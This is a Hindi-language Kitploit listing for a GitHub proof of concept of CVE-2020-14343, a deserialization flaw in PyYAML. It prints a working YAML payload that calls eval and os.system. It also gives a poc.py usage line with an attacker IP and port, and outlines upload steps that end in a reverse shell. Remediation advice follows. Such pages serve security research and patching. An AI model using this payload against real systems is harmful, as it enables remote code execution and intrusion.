Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/kairo-one/cve-2020-14343-pyyaml
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubkairo-one/cve-2020-14343-pyyaml

CVE-2020-14343-PyYAML

CVE-2020-14343 का पेलोड

रिपॉजिटरी देखें
29 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-14343 PyYAML डिसीरियलाइज़ेशन भेद्यता POC

भेद्यता अवलोकन

आइटमजानकारी
CVE आईडीCVE-2020-14343
प्रभावित घटकPyYAML < 5.4
भेद्यता प्रकारडिसीरियलाइज़ेशन रिमोट कोड निष्पादन (RCE)
खतरा स्तरउच्च जोखिम

भेद्यता सिद्धांत

PyYAML yaml.load() का उपयोग करके अविश्वसनीय डेटा को पार्स करते समय, खतरनाक YAML टैग (जैसे !!python/object) को प्रतिबंधित नहीं करता है, हमलावर मैलिशियस YAML सामग्री बनाकर मनमाना Python कोड निष्पादित कर सकता है।

पेलोड मुख्य:

root@kitploit:~
!!python/object/new:tuple
  - !!python/object/new:map
    - !!python/name:eval
    - ["__import__('os').system('command')"]

उपयोग विधि

root@kitploit:~
python poc.py <लक्ष्यURL> <हमलावरIP> <सुननेवालापोर्ट>

उदाहरण:

root@kitploit:~
python poc.py http://vulnerable-site.com 192.168.1.100 4444

हमला प्रक्रिया

  1. स्क्रिप्ट स्थानीय रूप से TCP लिसनर शुरू करती है
  2. लक्ष्य /upload इंटरफेस पर मैलिशियस YAML फ़ाइल अपलोड करें
  3. /login इंटरफेस ट्रिगर करें जो YAML लोड और पार्स करता है
  4. लक्ष्य सर्वर पेलोड निष्पादित करता है, हमलावर को रिवर्स शेल वापस भेजता है

निर्भरता स्थापना

root@kitploit:~
pip install requests

अस्वीकरण

⚠️ यह उपकरण केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए है!

  • कृपया अवैध उद्देश्यों के लिए उपयोग न करें
  • उपयोग से पहले सुनिश्चित करें कि आपके पास लक्ष्य सिस्टम का अधिकार है
  • लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है

सुधार सुझाव

  1. yaml.load() के बजाय yaml.safe_load() का उपयोग करें
  2. PyYAML को 5.4 या उससे ऊपर के संस्करण में अपग्रेड करें
  3. उपयोगकर्ता इनपुट को सख्ती से मान्य करें

संदर्भ लिंक

  • CVE-2020-14343 - NVD
  • PyYAML आधिकारिक दस्तावेज़
टूल डाउनलोड करें